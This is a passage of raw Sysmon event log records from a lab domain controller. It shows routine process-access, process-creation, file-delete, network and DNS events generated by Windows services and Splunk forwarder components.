14:02:19.349{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202178Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:19.349{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202177Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:19.349{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E86B-6040-1D4E-00000000AD01}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202176Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:19.349{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E86B-6040-1D4E-00000000AD01}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202175Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:19.350{5ABCFE62-E86B-6040-1D4E-00000000AD01}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002202186Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:20.661{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B1F6B159B626E93FDD84DD09A0B45A7,SHA256=CDB20B2EF0F164134F4AA9365B75F8BCE2CFD956B2C4838AF6DB2FE424C82A15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202188Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:21.724{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=61BCA681BF8CD58309143630E9A0812A,SHA256=47442BA19FCFE2070ED05231BF9D53563700F6827C21FE2A6A2EFEEBD17836CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202187Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:21.661{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A364183E19A1FA02D1A6AB14D623B01,SHA256=52F728F24DD6174443D28004EB9E5BBEF128B6E7EF4732A05916052DFBFA2FB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202190Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:22.677{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19082AB9E179141A262D3C1CFFBC8189,SHA256=B0BB12F0230F4BF466021AFF4931A6D0631A9905BB62C9E018E7B39851D2A6C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202189Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:22.208{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=CE0906E9FACB90D426FEFBB4100DFC63,SHA256=46456F38E9D753B85229E9A8CD2EA187FC59C9B8F8202B2A6D59044218FE57BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202192Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:23.693{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=077ACA94187028F7FCC11F62EE90A742,SHA256=90CB21FCFED2B812F80A2DA4D0598DC5F57A96F107C8CF105DC1BAE36433B4F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202191Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:23.255{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6B5065B9CA01D341FCF0E3ABA01B0A2A,SHA256=53D62B548E2E05F128EF00DE85BB47311C1EA1E6DC628E3998E5C4765CFA5A27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202196Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:24.927{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=096A1BA32FCEB5B997257B2FD71AE18C,SHA256=EA7F9F95CB3A3D1892147D91F2DA81497043018EE14411B304931CF2066E2A49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202195Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:24.708{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27B53AAB7216292BB6BF72ABE764FCF9,SHA256=A2E307167E07AAC9E5352142A4E2D737712E4EF58F38CAFB25F58D2B0BC2FBE4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202194Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:20.029{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60610-false10.0.1.12-8000- 354300x80000000000000002202193Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:19.872{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-52891-true2001:500:2d:0:0:0:0:dd.root-servers.net53domain 23542300x80000000000000002202197Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:25.724{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0D625E9DB48B4142A185DABCDC28C56,SHA256=A353E66949D6D5B0C0CD92D0D09C10DE71C01291FAEE3234A5790DC1556C25E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202198Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:26.739{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85CF67952DBE40055205AE7DBFACD1D7,SHA256=C8F1D8B8556B20118B8545A60764C4D8D97F9E1409626F8948329445AA3E1BB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202199Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:27.755{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25BE9DA8CDEA7C101A5424F0E9B542DE,SHA256=DC60A5F2F27BC1B51FFAC0F7FFA0A26A4C1E6496DCF95FD8CDD36426CC47464E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202201Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:28.755{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=779245D47604D1F4C60403FCCCCB6D26,SHA256=99230F15C4F239592D252F2C2838C2F0FE1DCB2EC71B35F5F8462B9A18A35550,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202200Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:28.255{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E6BBC581BD43365FC8BA41C10A982636,SHA256=373480292A101D7AF3E2033B15862D3DA226AE0921CF265B93F18C4D60C997A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202203Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:29.771{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CA1A9955AF457A0241F9325B2B0ACAE,SHA256=5FCB412BA7400FEBD00556F1F2159CDF573BB27CB9E5221870497543E63EAA8A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202202Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:25.076{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60611-false10.0.1.12-8000- 23542300x80000000000000002202204Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:30.771{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=512E1C61C77E1FAB8EDAF29493A06C4E,SHA256=FB2A4468B11E7E374283D9B7B6ED3E15E7EAE5C05AD23B8A1195758BEC9D599D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202205Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:31.786{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E201153E0F880420843C3632AAADA41,SHA256=97DC54A3DAC1A2BB6F130FA66CD05B284BFFF0BD3C749A68DA552FC8DB7D6F4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202206Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:32.802{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A04B0A562031BB6E097283469A727E5,SHA256=EB84BE2BB185D23BC22DB982841C31492ECFE56DAF1CFB010BE2C9E37320FB41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202207Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:33.818{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B58046459A865510B7DE6FE71579AE68,SHA256=23FF9294547CC885ADA56706A224D7B04BCFD46CC5769775F6650E388927BFDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202211Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:34.833{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AD41325DCFBA3B8634BFD605D36B6DF,SHA256=3A238DBBD05A7A48BE06994537CC71E01473A3EC359C4F0F3ED46D5DB85960CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202210Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:30.904{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60612-false10.0.1.12-8000- 23542300x80000000000000002202209Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:34.130{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8CC0F44603F1598CACA02F9CB5F73AA3,SHA256=138141D2EE3BC13988F4B6B95DC7A0B4B694F6349C7EC06DED5DB40300C93BDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202208Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:34.130{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E020DB4C9BB4FA350A3822A9372D40F4,SHA256=1838A56C6101A932897541591E845DF575A1DB0FADDBDA5CFA6DEC146CF409FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202215Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:35.833{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F70B4774B3D88C0E626B2F0AD1FFD848,SHA256=9A369A18A340C3DE031C5DEE39182712AA94E513BFF56569EC53A496AA3D0223,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202214Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:35.208{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-842F-603E-1600-00000000AD01}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202213Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:35.208{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-842F-603E-1600-00000000AD01}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202212Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:35.208{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-842F-603E-1600-00000000AD01}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002202216Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:36.849{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EE67E40A342773BDDB1A552C0D117AF,SHA256=BF703391CB448900FD578E28A5C22DD3E15EBF2F09ACDF16E82F2A670C5CFE7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202217Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:37.849{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD3827EF0F336BF177E22E31A49927B9,SHA256=D7CFA5239E6E86E207E742AF2BBBDE13F199FFAD7C19A3AEB2D2915C6960F31E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202218Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:38.864{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F954767B0E5098F09AD97CCC1C5A7A52,SHA256=84249272EBE8EBE5739F87BF06360DB783D0630F21B7AE3D27310C30BAEDDDCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202222Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:39.880{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13F74D62A954C60F9159D322FD1531D1,SHA256=9D2D33B10B5BE73E5D69232E754DEA208B6E5ED28CE900351CE111AC4372B45E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202221Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:35.966{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60614-false10.0.1.12-8000- 23542300x80000000000000002202220Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:39.130{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE206B53250E1925B523C28C2B691AA2,SHA256=A0636622530E976F1A06F6593FF11C7A019C1DBB57ED3995F19997CFFA9C3268,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202219Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:39.130{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8CC0F44603F1598CACA02F9CB5F73AA3,SHA256=138141D2EE3BC13988F4B6B95DC7A0B4B694F6349C7EC06DED5DB40300C93BDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202223Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:40.896{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECB9EB2EBCEE319052D27222EDF0D165,SHA256=DE002B185604CAE18F04401F0703D8F5B191C228A5C0ED3A6A31CC21335D25AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202226Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:41.911{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=422FF12E5F7E2C182B36F3DD55342351,SHA256=36F121B9644671422026A6E1FDE25192291D51F06657D6812BD73535FFE53C08,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202225Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:38.044{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local59265- 23542300x80000000000000002202224Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 